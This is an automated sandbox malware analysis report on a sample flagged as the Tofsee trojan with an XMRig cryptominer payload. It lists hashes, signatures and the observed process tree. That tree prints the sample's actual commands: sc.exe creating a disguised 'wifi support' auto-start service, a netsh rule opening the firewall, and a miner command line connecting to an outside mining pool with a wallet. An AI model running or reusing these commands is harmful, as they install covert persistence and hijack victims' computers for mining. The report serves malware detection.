Malware Analysis Report

2025-08-05 13:21

Sample ID 231119-3vt5eadf5y
Target 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.zip
SHA256 d67fc64d34afd907136004df31bd8c6309f4904094fce34e873fa361ac76e0dd
Tags tofsee xmrig evasion miner persistence trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256 d67fc64d34afd907136004df31bd8c6309f4904094fce34e873fa361ac76e0dd

Threat Level: Known bad

The file 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.zip was found to be: Known bad.

Malicious Activity Summary

tofsee xmrig evasion miner persistence trojan

Tofsee

xmrig

XMRig Miner payload

Creates new service(s)

Modifies Windows Firewall

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported 2023-11-19 23:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2023-11-19 23:50
Reported 2023-11-19 23:55
Platform win7-20231020-en
Max time kernel 5s
Max time network 162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

Signatures

Tofsee

trojan tofsee

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\permvqxi\

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe" C:\Windows\SysWOW64\permvqxi\

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" create permvqxi binPath= "C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d\"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe\"" type= own start= auto DisplayName= "wifi support"

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" description permvqxi "wifi internet conection"

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" start permvqxi

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\svchost.exe

svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1

Network

Files

C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe

MD5 41e5c245a82a8504a70527e839ae883e
SHA1 080f8d3a98ac6769752e221403d17354a4afa0b5
SHA256 51fd31d38d471d045b16fd4b4fedc2cd52aedfe29845cc212e8d61bf5758e746
SHA512 b281798cb0e3cf7c7bcf001dc7ff8f5f10af5e3b6c6ac12d286a0d07fb9e7d718c8b2c4e5f32df7fd50f4e7de92e1eefd353f7cb5a6b4d537dfae67648188b69

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe

MD5 9bbc5d1f6be289e2071874e4a8e1815a
SHA1 362815bd2e08ecca3f49caa89dc21b2fbd104dcf
SHA256 c0ae437eaa40a777b2087deaadd1fabe001c2fc6208f54033b7eaa39847a3847
SHA512 fce8a86aaa9284f5edc42a69af9ca3bcaaa3b524877b13a55705f330876f5c0871f46fd216aef955f541ac231379af2866ae8eca7805fb8c03114b7991aac525

Analysis: behavioral2

Detonation Overview

Submitted 2023-11-19 23:50
Reported 2023-11-19 23:55
Platform win10v2004-20231023-en
Max time kernel 132s
Max time network 157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

Network

Files

N/A